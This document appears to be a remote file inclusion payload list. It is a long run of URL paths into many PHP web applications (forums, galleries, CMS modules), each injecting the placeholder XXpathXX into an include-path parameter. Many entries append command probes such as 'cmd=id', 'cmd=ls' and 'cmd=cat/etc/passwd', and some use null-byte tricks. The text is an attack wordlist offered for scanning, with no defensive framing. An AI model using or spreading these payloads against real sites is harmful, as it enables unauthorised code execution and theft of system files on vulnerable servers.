/files/message-delete.php3?BSX_LIBDIR=XXpathXX /files/message-forward.php3?BSX_LIBDIR=XXpathXX /files/message-header.php3?BSX_LIBDIR=XXpathXX /files/message-print.php3?BSX_LIBDIR=XXpathXX /files/message-read.php3?BSX_LIBDIR=XXpathXX /files/message-reply.php3?BSX_LIBDIR=XXpathXX /files/message-replyall.php3?BSX_LIBDIR=XXpathXX /files/message-search.php3?BSX_LIBDIR=XXpathXX /findix/index.php?page=XXpathXX?&cmd=id /fishcart_v3/fc_functions/fc_example.php?docroot=XXpathXX /flushcmd/Include/editor/rich_files/class.rich.php?class_path=XXpathXX? /fonctions/template.php?repphp=XXpathXX? /fonctions_racine.php?chemin_lib=XXpathXX /footer.inc.php?settings[footer]=XXpathXX /footer.inc.php?tfooter=XXpathXX? /footer.php?footer_file=XXpathXX /footer.php?op[footer_body]=XXpathXX? /form.php?path=XXpathXX?&cmd=pwd /forum.php?cfg_file=1&fpath=XXpathXX? /forum/forum.php?view=XXpathXX /forum/forum82lib.php3?repertorylevel=XXpathXX? /forum/gesfil.php?repertorylevel=XXpathXX? /forum/lostpassword.php?repertorylevel=XXpathXX? /forum/mail.php?repertorylevel=XXpathXX? /forum/member.php?repertorylevel=XXpathXX? /forum/message.php?repertorylevel=XXpathXX? /forum/search.php?repertorylevel=XXpathXX? /forum/track.php?path=XXpathXX /frame.php?framefile=XXpathXX /ftp.php?path_local=XXpathXX /function.inc.php?path=XXpathXX /function.php?adminfolder=XXpathXX /function.php?gbpfad=XXpathXX /functions.php?include_path=XXpathXX /functions.php?pmp_rel_path=XXpathXX /functions.php?s[phppath]=XXpathXX /functions.php?set_path=XXpathXX? /functions/form.func.php?GLOBALS[PTH][classes]=XXpathXX? /functions/general.func.php?GLOBALS[PTH][classes]=XXpathXX? /functions/groups.func.php?GLOBALS[PTH][classes]=XXpathXX? /functions/js.func.php?GLOBALS[PTH][classes]=XXpathXX? /functions/prepend_adm.php?SETS[path][physical]=XXpathXX /functions/prepend_adm.php?SETS[path][physical]=XXpathXX? /functions/sections.func.php?GLOBALS[PTH][classes]=XXpathXX? /functions/users.func.php?GLOBALS[PTH][classes]=XXpathXX? /functions_mod_user.php?phpbb_root_path=XXpathXX?&cmd=ls /fusebox5.php?FUSEBOX_APPLICATION_PATH=XXpathXX /galerie.php?config[root_ordner]=XXpathXX?cmd=id /gallery/captionator.php?GALLERY_BASEDIR=XXpathXX /gallery/lib/content.php?include=XXpathXX?cmd=ls /gallery/theme/include_mode/template.php?galleryfilesdir=XXpathXX /gallerypath/index.php?includepath=XXpathXX /games.php?id=XXpathXX /games.php?scoreid=XXpathXX /gbook/includes/header.php?abspath=XXpathXX? /gemini/page/forums/bottom.php?lang=XXpathXX? /gen_m3u.php?phpbb_root_path=XXpathXX /genepi.php?topdir=XXpathXX /generate.php?ht_pfad=XXpathXX? /gepi/gestion/savebackup.php?filename=XXpathXX&cmd=cat/etc/passwd /gestArt/aide.php3?aide=XXpathXX? /get_session_vars.php?path_to_smf=XXpathXX /getpage.php?page=online&doc_path=XXpathXX /global.php?abs_path=XXpathXX? /gorum/dbproperty.php?appDirName=XXpathXX /gpb/include/db.mysql.inc.php?root_path=XXpathXX? /gpb/include/gpb.inc.php?root_path=XXpathXX? /graph.php?DOCUMENT_ROOT=XXpathXX? /gruppen.php?config[root_ordner]=XXpathXX?&cmd=id /handlers/email/mod.listmail.php?_PM_[path][handle]=XXpathXX /handlers/page/show.php?sous_rep=XXpathXX /head.php?CONFIG[MWCHAT_Libs]=XXpathXX? /header.inc.php?CssFile=XXpathXX /header.php?path=XXpathXX /header.php?wwwRoot=XXpathXX /help.php?CONFIG[MWCHAT_Libs]=XXpathXX? /help/index.php?show=XXpathXX /help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX /helperfunction.php?includedir=XXpathXX /hioxBannerRotate.php?hm=XXpathXX /hioxRandomAd.php?hm=XXpathXX /hioxstats.php?hm=XXpathXX /hioxupdate.php?hm=XXpathXX /home.php?a=XXpathXX /home.php?page=XXpathXX /home.php?pagina=XXpathXX /home/www/images/doc/index2.php?type=XXpathXX /home1.php?ln=XXpathXX /home2.php?ln=XXpathXX /hsList.php?subdir=XXpathXX?&cmd=ls /htdocs/gmapfactory/params.php?gszAppPath=XXpathXX /html/admin/modules/plugin_admin.php?_settings[pluginpath]=XXpathXX /hu/modules/reg-new/modstart.php?mod_dir=XXpathXX? /i_head.php?home=XXpathXX /i_nav.php?home=XXpathXX /iframe.php?file=XXpathXX /image.php?url=XXpathXX??? /impex/ImpExData.php?systempath=XXpathXX /import.php?bibtexrootrel=XXpathXX? /importinfo.php?bibtexrootrel=XXpathXX? /in.php?returnpath=XXpathXX /inc/articles.inc.php?GLOBALS[CHEMINMODULES]=XXpathXX /inc/config.inc.php?x[1]=XXpathXX /inc/design.inc.php?dir[data]=XXpathXX /inc/download_center_lite.inc.php?script_root=XXpathXX /inc/formmail.inc.php?script_root=XXpathXX /inc/gabarits.php?cfg_racine=XXpathXX /inc/header.inc.php?ficStyle=XXpathXX /inc/ifunctions.php?GLOBALS[phpQRootDir]=XXpathXX /inc/inc.php?cfg_racine=XXpathXX? /inc/indexhead.php?fileloc=XXpathXX? /inc/irayofuncs.php?irayodirhack=XXpathXX? /inc/libs/Smarty_Compiler.class.php?plugin_file=XXpathXX? /inc/libs/core/core.display_debug_console.php?plugin_file=XXpathXX? /inc/libs/core/core.load_plugins.php?plugin_file=XXpathXX? /inc/libs/core/core.load_resource_plugin.php?plugin_file=XXpathXX? /inc/libs/core/core.process_cached_inserts.php?plugin_file=XXpathXX? /inc/libs/core/core.process_compiled_include.php?plugin_file=XXpathXX? /inc/libs/core/core.read_cache_file.php?plugin_file=XXpathXX? /inc/linkbar.php?cfile=XXpathXX? /inc/login.php?pathCGX=XXpathXX /inc/logingecon.php?pathCGX=XXpathXX /inc/ltdialogo.php?pathCGX=XXpathXX /inc/mtdialogo.php?pathCGX=XXpathXX /inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=XXpathXX? /inc/prepend.inc.php?path=XXpathXX? /inc/service.alert.inc.php?SPL_CFG[dirroot]=XXpathXX? /inc/settings.php?inc_dir=XXpathXX /inc/settings.ses.php?SPL_CFG[dirroot]=XXpathXX? /inc/shows.inc.php?cutepath=XXpathXX? /inc/sige_init.php?SYS_PATH=XXpathXX? /inc_group.php?include_path=XXpathXX? /inc_manager.php?include_path=XXpathXX? /inc_newgroup.php.php?include_path=XXpathXX? /inc_smb_conf.php?include_path=XXpathXX? /inc_user.php?include_path=XXpathXX? /include.php?_APP_RELATIVE_PATH=XXpathXX /include.php?gorumDir=XXpathXX /include.php?myng_root=XXpathXX /include.php?path=psp/user.php&site=XXpathXX /include.php?path[docroot]=XXpathXX /include.php?sunPath=XXpathXX /include/Beautifier/Core.php?BEAUT_PATH=XXpathXX /include/HTML_oben.php?include_path=XXpathXX /include/HTML_oben.php?include_path=XXpathXX? /include/SQuery/gameSpy2.php?libpath=XXpathXX /include/bbs.lib.inc.php?site_path=XXpathXX /include/class_yapbbcooker.php?cfgIncludeDirectory=XXpathXX /include/classes.php?INCLUDE_DIR=XXpathXX? /include/client.php?INCLUDE_DIR=XXpathXX? /include/cls_headline_prod.php?INCLUDE_PATH=XXpathXX /include/cls_listorders.php?INCLUDE_PATH=XXpathXX /include/cls_viewpastorders.php?INCLUDE_PATH=XXpathXX /include/common.php?XOOPS_ROOT_PATH=XXpathXX /include/common_functions.php?baros_path=XXpathXX? /include/config.inc.php?racine=XXpathXX /include/copyright.php?tsep_config[absPath]=XXpathXX?cmd=ls /include/customize.php?l=XXpathXX&text=Hello%20World /include/default_header.php?script_path=XXpathXX /include/define.php?INC_DIR=XXpathXX? /include/disp_form.php3?cfg_include_dir=XXpathXX? /include/disp_smileys.php3?cfg_include_dir=XXpathXX? /include/dom.php?path=XXpathXX /include/dtd.php?path=XXpathXX /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=XXpathXX? /include/engine/content/elements/menu.php?CONFIG[AdminPath]=XXpathXX /include/forms.php?INCLUDE_DIR=XXpathXX? /include/global.php?pfad=XXpathXX /include/header.php?cs_base_path=XXpathXX? /include/html/nettools.popup.php?DIR=XXpathXX /include/inc.foot.php?root=XXpathXX /include/inc_ext/spaw/dialogs/table.php?spaw_root=XXpathXX /include/inc_freigabe.php?include_path=XXpathXX? /include/inc_freigabe1.php?include_path=XXpathXX? /include/inc_freigabe3.php?include_path=XXpathXX? /include/include_stream.inc.php?include_path=XXpathXX /include/include_top.php?g_include=XXpathXX /include/includes.php?include_path=XXpathXX /include/index.php3?cfg_include_dir=XXpathXX? /include/init.inc.php?G_PATH=XXpathXX /include/issue_edit.php?INCLUDE_DIR=XXpathXX? /include/lib/lib_slots.php?main_path=XXpathXX /include/lib/lib_stats.php?main_path=XXpathXX? /include/lib/lib_users.php?main_path=XXpathXX? /include/little_news.php3?cfg_include_dir=XXpathXX? /include/livre_include.php?no_connect=lol&chem_absolu=XXpathXX? /include/loading.php?path_include=XXpathXX /include/mail.inc.php?root=XXpathXX /include/menu_builder.php?config[page_dir]=XXpathXX? /include/misc/mod_2checkout/2checkout_return.inc.php?DIR=XXpathXX /include/monitoring/engine/MakeXML.php?fileOreonConf=XXpathXX? /include/parser.php?path=XXpathXX /include/pear/IT.php?basepath=XXpathXX? /include/pear/ITX.php?basepath=XXpathXX? /include/pear/IT_Error.php?basepath=XXpathXX? /include/phpxd/phpXD.php?appconf[rootpath]=XXpathXX?&cmd=id /include/prodler.class.php?sPath=XXpathXX??? /include/scripts/export_batch.inc.php?DIR=XXpathXX /include/scripts/run_auto_suspend.cron.php?DIR=XXpathXX /include/scripts/send_email_cache.php?DIR=XXpathXX /include/startup.inc.php?root_path=XXpathXX? /include/themes/themefunc.php?myNewsConf[path][sys][index]=XXpathXX? /include/timesheet.php?config[include_dir]=XXpathXX /include/urights.php?CRM_inc=XXpathXX /includes/admin_board2.php?phpbb_root_path=XXpathXX?ls /includes/admin_logger.php?phpbb_root_path=XXpathXX?ls /includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=XXpathXX? /includes/ajax_listado.php?urlModulo=XXpathXX /includes/archive/archive_topic.php?phpbb_root_path=XXpathXX? /includes/bbcb_mg.php?phpbb_root_path=XXpathXX? /includes/begin.inc.php?PagePrefix=XXpathXX /includes/blogger.php?path_prefix=XXpathXX /includes/class/class_tpl.php?cache_file=XXpathXX? /includes/class_template.php?quezza_root_path=XXpathXX /includes/classes/pctemplate.php?pcConfig[smartyPath]=XXpathXX?cmd /includes/common.inc.php?CONFIG[BASE_PATH]=XXpathXX /includes/common.php?module_root_path=XXpathXX? /includes/common.php?root=XXpathXX? /includes/common.php?root_path=XXpathXX? /includes/config.inc.php?racineTBS=XXpathXX /includes/config/master.inc.php?fm_data[root]=XXpathXX? /includes/connection.inc.php?PagePrefix=XXpathXX /includes/dbal.php?eqdkp_root_path=XXpathXX /includes/events.inc.php?PagePrefix=XXpathXX /includes/footer.html.inc.php?tc_config[app_root]=XXpathXX? /includes/footer.inc.php?PagePrefix=XXpathXX /includes/footer.php?PHPGREETZ_INCLUDE_DIR=XXpathXX /includes/functions.inc.php?sitepath=XXpathXX? /includes/functions.php?location=XXpathXX /includes/functions.php?phpbb_root_path=XXpathXX /includes/functions.php?phpbb_root_path=XXpathXX? /includes/functions/auto_email_notify.php?path_prefix=XXpathXX /includes/functions/html_generate.php?path_prefix=XXpathXX /includes/functions/master.inc.php?fm_data[root]=XXpathXX? /includes/functions/validations.php?path_prefix=XXpathXX /includes/functions_admin.php?phpbb_root_path=XXpathXX? /includes/functions_install.php?vwar_root=XXpathXX /includes/functions_kb.php?phpbb_root_path=XXpathXX? /includes/functions_mod_user.php?phpbb_root_path=XXpathXX? /includes/functions_portal.php?phpbb_root_path=XXpathXX? /includes/functions_user_viewed_posts.php?phpbb_root_path=XXpathXX? /includes/global.php?nbs=XXpathXX? /includes/header.inc.php?PagePrefix=XXpathXX /includes/header.inc.php?dateiPfad=XXpathXX /includes/include_once.php?include_file=XXpathXX /includes/init.php?includepath=XXpathXX? /includes/iplogger.php?phpbb_root_path=XXpathXX?ls /includes/kb_constants.php?module_root_path=XXpathXX /includes/lang/language.php?path_to_root=XXpathXX /includes/lib-account.inc.php?CONF_CONFIG_PATH=XXpathXX? /includes/lib-group.inc.php?CONF_CONFIG_PATH=XXpathXX? /includes/lib-log.inc.php?CONF_CONFIG_PATH=XXpathXX? /includes/lib-mydb.inc.php?CONF_CONFIG_PATH=XXpathXX? /includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=XXpathXX? /includes/lib-themes.inc.php?CONF_CONFIG_PATH=XXpathXX? /includes/logger_engine.php?phpbb_root_path=XXpathXX /includes/menuleft.inc.php?PagePrefix=XXpathXX /includes/mkb.php?phpbb_root_path=XXpathXX?ls /includes/morcegoCMS/adodb/adodb.inc.php?path=XXpathXX /includes/morcegoCMS/morcegoCMS.php?fichero=XXpathXX /includes/mx_common.php?module_root_path=XXpathXX? /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=XXpathXX /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=XXpathXX /includes/pafiledb_constants.php?module_root_path=XXpathXX /includes/pages.inc.php?PagePrefix=XXpathXX /includes/phpdig/includes/config.php?relative_script_path=XXpathXX /includes/profilcp_constants.php?module_root_path=XXpathXX? /includes/settings.inc.php?approot=XXpathXX /includes/template.php?myevent_path=XXpathXX /includes/themen_portal_mitte.php?phpbb_root_path=XXpathXX /includes/tumbnail.php?config[root_ordner]=XXpathXX? /includes/usercp_register.php?phpbb_root_path=XXpathXX? /includes/usercp_viewprofile.php?phpbb_root_path=XXpathXX? /includes/xhtml.php?d_root=XXpathXX? /index.php3?Application_Root=XXpathXX /index.php?1=lol&PAGES[lol]=XXpathXX /index.php?AML_opensite=XXpathXX /index.php?AMV_openconfig=1&AMV_serverpath=XXpathXX /index.php?CONFIG[MWCHAT_Libs]=XXpathXX? /index.php?ConfigDir=XXpathXX /index.php?DIR_PLUGINS=XXpathXX /index.php?G_JGALL[inc_path]=XXpathXX%00 /index.php?HomeDir=XXpathXX /index.php?Lang=AR&Page=XXpathXX /index.php?Madoa=XXpathXX? /index.php?RP_PATH=XXpathXX /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=XXpathXX /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=XXpathXX /index.php?abg_path=XXpathXX? /index.php?abs_path=XXpathXX? /index.php?adduser=true&lang=XXpathXX /index.php?adodb=XXpathXX /index.php?ads_file=XXpathXX /index.php?arquivo=XXpathXX /index.php?back=XXpathXX /index.php?base==XXpathXX /index.php?basePath=XXpathXX /index.php?bibtexrootrel=XXpathXX? /index.php?blog_dc_path=XXpathXX /index.php?blog_theme=XXpathXX /index.php?body=XXpathXX /index.php?class_path=XXpathXX? /index.php?classified_path=XXpathXX? /index.php?cms=XXpathXX? /index.php?config["sipssys"]=XXpathXX /index.php?config[root_ordner]=XXpathXX?&cmd=id /index.php?config[root_ordner]=XXpathXX?cmd=id /index.php?config_atkroot=XXpathXX /index.php?configuration=XXpathXX /index.php?custom_admin_path=XXpathXX? /index.php?dateiPfad=XXpathXX?&cmd=ls /index.php?de=XXpathXX /index.php?dept=XXpathXX /index.php?do=XXpathXX /index.php?exec=XXpathXX? /index.php?ext=XXpathXX /index.php?faq_path=XXpathXX?&cmd=id /index.php?file_name[]=XXpathXX? /index.php?file_path=XXpathXX? /index.php?fileloc=XXpathXX /index.php?from=XXpathXX /index.php?func=XXpathXX? /index.php?function=XXpathXX /index.php?function=custom&custom=XXpathXX /index.php?gOo=XXpathXX /index.php?gen=XXpathXX /index.php?get=XXpathXX /index.php?home_name=XXpathXX /index.php?ilang=XXpathXX? /index.php?inc_dir=XXpathXX /index.php?inc_dir=XXpathXX? /index.php?includeDir=XXpathXX /index.php?includeFooter=XXpathXX /index.php?includesdir=XXpathXX /index.php?insPath=XXpathXX /index.php?lang=XXpathXX /index.php?language=XXpathXX? /index.php?language=en&main_page=XXpathXX /index.php?lizge=XXpathXX?&cmd=ls /index.php?lng=XXpathXX /index.php?load=XXpathXX /index.php?loadpage=XXpathXX /index.php?main_tabid=1&main_content=XXpathXX /index.php?may=XXpathXX /index.php?middle=XXpathXX /index.php?mode=XXpathXX /index.php?modpath=XXpathXX /index.php?module=PostWrap&page=XXpathXX /index.php?mosConfig_absolute_path=XXpathXX /index.php?news7["functions"]=XXpathXX /index.php?news_include_path=XXpathXX /index.php?open=XXpathXX /index.php?option=com_custompages&cpage=XXpathXX? /index.php?page=XXpathXX /index.php?page=XXpathXX%00 /index.php?page=XXpathXX? /index.php?pageXXpathXX /index.php?page[path]=XXpathXX?&cmd=ls /index.php?pagename=XXpathXX /index.php?pager=XXpathXX /index.php?pagina=XXpathXX? /index.php?path_to_folder=XXpathXX?cmd=id /index.php?pg=XXpathXX? /index.php?phpbb_root_path=XXpathXX /index.php?plugin=XXpathXX /index.php?principal=XXpathXX /index.php?proMod=XXpathXX /index.php?proMod=XXpathXX?cmd /index.php?project=XXpathXX /index.php?repinc=XXpathXX? /index.php?root_prefix=XXpathXX /index.php?root_prefix=XXpathXX? /index.php?section=XXpathXX /index.php?site=XXpathXX /index.php?site_path=XXpathXX /index.php?styl[top]=XXpathXX?? /index.php?template=XXpathXX? /index.php?templates_dir=XXpathXX? /index.php?theme=XXpathXX /index.php?themepath=XXpathXX? /index.php?themesdir=XXpathXX /index.php?this_path=XXpathXX? /index.php?txt=XXpathXX /index.php?up=XXpathXX /index.php?url=XXpathXX /index.php?w=XXpathXX /index.php?way=XXpathXX?????????????? /index1.php?=XXpathXX /index1.php?inc=XXpathXX /index1.php?inhalt=XXpathXX /index2.php?=XXpathXX /index2.php?content=XXpathXX /index2.php?s=XXpathXX /index2.php?x=XXpathXX /indexinfo.php?bibtexrootrel=XXpathXX? /indexk.php?lib_path=XXpathXX? /info.php?file=XXpathXX /inhalt.php?dateien[news]=XXpathXX? /init.php?API_HOME_DIR=XXpathXX /init.php?scriptpath=XXpathXX? /initialize.php?hmail_config[includepath]=XXpathXX&cmd=dir /initiate.php?abs_path=XXpathXX /install.php?_NE[AbsPath]=XXpathXX /install.php?install_dir=XXpathXX /install/config.php?path=XXpathXX /install/di.php?pathtoserverdata=XXpathXX /install/index.php?content_php=XXpathXX /install/install3.php?database=none&cabsolute_path=XXpathXX /integration/shortstat/configuration.php?SPL_CFG[dirroot]=XXpathXX? /interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=XXpathXX? /interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=XXpathXX? /interface/billing/billing_process.php?srcdir=XXpathXX? /interface/editors/-custom.php?bField[bf_data]=XXpathXX /interface/editors/custom.php?bField[bf_data]=XXpathXX /interface/new/new_patient_save.php?srcdir=XXpathXX? /intern/admin/?rootdir=XXpathXX /intern/admin/other/backup.php?admin=1&rootdir=XXpathXX /intern/clan/member_add.php?rootdir=XXpathXX /intern/config/forum.php?rootdir=XXpathXX /intern/config/key_2.php?rootdir=XXpathXX /ip.inc.php?type=1&cgipath=XXpathXX /ipeer_site/?page=XXpathXX? /joinus.php?vwar_root=XXpathXX /joinus.php?vwar_root=XXpathXX?&cmd=ls /joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=XXpathXX? /joomla_path/components/com_articles.php?absolute_path=XXpathXX? /js/bbcodepress/bbcode-form.php?BBCODE_path=XXpathXX /js/wptable-tinymce.php?ABSPATH=XXpathXX /jscript.php?my_ms[root]=XXpathXX? /kernel/class/ixpts.class.php?IXP_ROOT_PATH=XXpathXX /kernel/loadkernel.php?installPath=XXpathXX /kmitaadmin/kmitam/htmlcode.php?file=XXpathXX? /ktmlpro/includes/ktedit/toolbar.php?dirDepth=XXpathXX /lang/leslangues.php?fichier=XXpathXX /lang_english/lang_main_album.php?phpbb_root_path=XXpathXX?a= /language/lang_english/lang_activity.php?phpbb_root_path=XXpathXX /language/lang_english/lang_admin_album.php?phpbb_root_path=XXpathXX?a= /language/lang_german/lang_admin_album.php?phpbb_root_path=XXpathXX?a= /language/lang_german/lang_main_album.php?phpbb_root_path=XXpathXX?a= /latestposts.php?forumspath=XXpathXX /latex.php?bibtexrootrel=XXpathXX? /layout/default/params.php?gConf[dir][layouts]=XXpathXX? /ldap/authldap.php?includePath=XXpathXX /learnPath/include/scormExport.inc.php?includePath=XXpathXX /lib.editor.inc.php?sys_path=XXpathXX? /lib/Loggix/Module/Calendar.php?pathToIndex=XXpathXX /lib/Loggix/Module/Comment.php?pathToIndex=XXpathXX /lib/Loggix/Module/Rss.php?pathToIndex=XXpathXX /lib/Loggix/Module/Trackback.php?pathToIndex=XXpathXX /lib/action/rss.php?lib=XXpathXX? /lib/activeutil.php?set[include_path]=XXpathXX? /lib/addressbook.php?GLOBALS[basedir]=XXpathXX /lib/armygame.php?libpath=XXpathXX /lib/authuser.php?root=XXpathXX /lib/base.php?BaseCfg[BaseDir]=XXpathXX /lib/connect.php?root=XXpathXX /lib/connected_users.lib.php3?ChatPath=XXpathXX /lib/connected_users.lib.php3?ChatPath=XXpathXX? /lib/db/mysql.class.php?root=XXpathXX /lib/db/postgres.class.php?root=XXpathXX /lib/functions.php?DOC_ROOT=XXpathXX /lib/googlesearch/GoogleSearch.php?APP[path][lib]=XXpathXX? /lib/header.php?DOC_ROOT=XXpathXX /lib/language.php?_LIB_DIR=XXpathXX /lib/live_status.lib.php?ROOT=XXpathXX /lib/misc.php?root=XXpathXX /lib/nl/nl.php?g_strRootDir=XXpathXX /lib/obj/collection.class.php?GLOBALS[application][app_root]=XXpathXX /lib/obj/content_image.class.php?GLOBALS[application][app_root]=XXpathXX /lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX /lib/pcltrace.lib.php?g_pcltar_lib_dir=XXpathXX /lib/rs.php?rootpath=XXpathXX /lib/selectlang.php?BBC_LANGUAGE_PATH=XXpathXX /lib/smarty/SmartyFU.class.php?system[smarty][dir]=XXpathXX? /lib/static/header.php?set_menu=XXpathXX /lib/tpl.inc.php?conf[classpath]=XXpathXX /libraries/comment/postComment.php?path[cb]=XXpathXX?a= /libraries/database.php?path=XXpathXX??? /libraries/lib-remotehost.inc.php?phpAds_geoPlugin=XXpathXX /libraries/pcl/pcltar.php?g_pcltar_lib_dir=XXpathXX /library/authorize.php?login_form=XXpathXX? /library/translation.inc.php?GLOBALS[srcdir]=XXpathXX? /libs/db.php?path_local=XXpathXX /libs/ftp.php?path_local=XXpathXX /libs/lom.php?ETCDIR=XXpathXX /libsecure.php?abs_path=XXpathXX? /license.php?CONFIG[MWCHAT_Libs]=XXpathXX? /link_main.php?phpbb_root_path=XXpathXX /linkadmin.php?page=XXpathXX? /linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=XXpathXX? /list.php?phpbb_root_path=XXpathXX /lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=XXpathXX /lms_path/modules/welcome.php?_LIB_DIR=XXpathXX /load_lang.php?_SERWEB[configdir]=XXpathXX /load_lang.php?_SERWEB[serwebdir]=XXpathXX /load_phplib.php?_PHPLIB[libdir]=XXpathXX /loader.php?GLOBALS=XXpathXX /local/lib/lcUser.php?LIBDIR=XXpathXX? /log.php?bibtexrootrel=XXpathXX? /login.php3?cl_headers=XXpathXX /login.php?base_dir=XXpathXX /login.php?blog_theme=XXpathXX /login.php?langfile=XXpathXX /login.php?pachtofile=XXpathXX /login.php?srcdir=XXpathXX? /login.php?value=XXpathXX?? /lovecms/install/index.php?step=XXpathXX? /m2f/m2f_cron.php?m2f_root_path=XXpathXX /m2f/m2f_forum.php?m2f_root_path=XXpathXX /m2f/m2f_mailinglist.php?m2f_root_path=XXpathXX /m2f/m2f_phpbb204.php?m2f_root_path=XXpathXX /maguz.php?site=XXpathXX /mail/childwindow.inc.php?form=XXpathXX? /mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=XXpathXX? /mail_this_entry/mail_autocheck.php?pm_path=XXpathXX?&cmd=ls /main.inc.php?pathtoscript=XXpathXX /main.php?config[search_disp]=true&include_dir=XXpathXX /main.php?id=XXpathXX /main.php?include_path=XXpathXX? /main.php?pageURL=XXpathXX /main.php?pagina=XXpathXX /main/forum/komentar.php?site_path=XXpathXX /main/main.php?pi=XXpathXX /main/ppcbannerclick.php?INC=XXpathXX? /main/ppcclick.php?INC=XXpathXX? /main_prepend.php?_SERWEB[functionsdir]=XXpathXX /mainpage.php?docroot=XXpathXX?cmd /mamboleto.php?mosConfig_absolute_path=XXpathXX /mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=XXpathXX /manage_songs.php?foing_root_path=XXpathXX /manager/admin/index.php?MGR=XXpathXX /manager/admin/p_ins.php?MGR=XXpathXX /manager/admin/u_ins.php?MGR=XXpathXX /manager/articles.php?_PX_config[manager_path]=XXpathXX /manager/static/view.php?propID=0&INC=XXpathXX /master.php?root_path=XXpathXX /mcNews/admin/header.php?skinfile=XXpathXX /mcf.php?content=XXpathXX /mcnews/admin/install.php?l=XXpathXX /mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=XXpathXX /member.php?vwar_root=XXpathXX /member/usercp_menu.php?script_folder=XXpathXX /members/index.php?INC=XXpathXX? /members/registration.php?INC=XXpathXX? /members_help.php?hlp=XXpathXX? /membres/membreManager.php?include_path=XXpathXX? /menu.php3?cl_headers=XXpathXX /menu.php?functions_file=XXpathXX /mep/frame.php?chem=XXpathXX? /microcms/includes/file_manager/special.php?fm_includes_special=XXpathXX /middle.php?file=XXpathXX /migrateNE2toNE3.php?_NE[AbsPath]=XXpathXX /mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=XXpathXX? /mindmeld/include/ask.inc.php?MM_GLOBALS[home]=XXpathXX? /mindmeld/include/learn.inc.php?MM_GLOBALS[home]=XXpathXX? /mindmeld/include/manage.inc.php?MM_GLOBALS[home]=XXpathXX? /mindmeld/include/mind.inc.php?MM_GLOBALS[home]=XXpathXX? /mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=XXpathXX? /mini-pub.php/front-end/img.php?sFileName=XXpathXX? /minimal/wiki.php?page=XXpathXX? /misc/function.php3?path=XXpathXX? /mitglieder.php?config[root_ordner]=XXpathXX?&cmd=id /mkportal/include/user.php?MK_PATH=XXpathXX /mkportal/include/user.php?MK_PATH=XXpathXX? /mod/authent.php4?rootpath=XXpathXX /mod/image/index.php?config[pathMod]=XXpathXX /mod/liens/index.php?config[pathMod]=XXpathXX /mod/liste/index.php?config[pathMod]=XXpathXX /mod/special/index.php?config[pathMod]=XXpathXX /mod/texte/index.php?config[pathMod]=XXpathXX /mod_membre/inscription.php?chemin=XXpathXX? /mod_phpalbum/sommaire_admin.php?chemin=XXpathXX? /modernbill/include/html/config.php?DIR=XXpathXX /modifyform.html?code=XXpathXX /mods/business_functions.php?GALLERY_BASEDIR=XXpathXX /mods/config/load.inc.php?moddir=XXpathXX? /mods/http/load.inc.php?moddir=XXpathXX? /mods/ui_functions.php?GALLERY_BASEDIR=XXpathXX /module/forum/forum.php?fd=XXpathXX='; /module/forum/main.php?id=1&main_dir=XXpathXX?& /modules.php?name=XXpathXX&file=article&sid=2 /modules/4nAlbum/public/displayCategory.php?basepath=XXpathXX /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=XXpathXX /modules/Calendar/admin/update.php?calpath=XXpathXX? /modules/Calendar/calendar.php?calpath=XXpathXX? /modules/Calendar/scheme.php?calpath=XXpathXX? /modules/Discipline/CategoryBreakdownTime.php?FocusPath=XXpathXX /modules/Discipline/CategoryBreakdownTime.php?staticpath=XXpathXX /modules/Discipline/StudentFieldBreakdown.php?staticpath=XXpathXX /modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX /modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX /modules/My_eGallery/index.php?basepath=XXpathXX /modules/My_eGallery/public/displayCategory.php?basepath=XXpathXX /modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=XXpathXX? /modules/NukeAI/util.php?AIbasedir=XXpathXX /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=XXpathXX /modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX /modules/abook/foldertree.php?baseDir==XXpathXX? /modules/addons/plugin.php?doc_root=XXpathXX /modules/admin/include/config.php?doc_root=XXpathXX /modules/admin/include/localize.php?doc_root=XXpathXX /modules/agendax/addevent.inc.php?agendax_path=XXpathXX&cmd=id /modules/bank/includes/design/main.inc.php?bank_data[root]=XXpathXX? /modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=XXpathXX /modules/birstday/birst.php?exbb[home_path]=XXpathXX? /modules/birstday/profile_show.php?exbb[home_path]=XXpathXX? /modules/birstday/select.php?exbb[home_path]=XXpathXX? /modules/blocks/headerfile.php?system[path]=XXpathXX /modules/calendar/index.php?inc_dir=XXpathXX /modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=XXpathXX? /modules/calendar/mod_calendar.php?absolute_path=XXpathXX? /modules/certinfo/index.php?full_path=XXpathXX /modules/character_roster/include.php?mod_root=XXpathXX? /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=XXpathXX? /modules/coppermine/themes/default/theme.php?THEME_DIR=XXpathXX /modules/downloads/lib/LM_Downloads.php?pathToIndex=XXpathXX 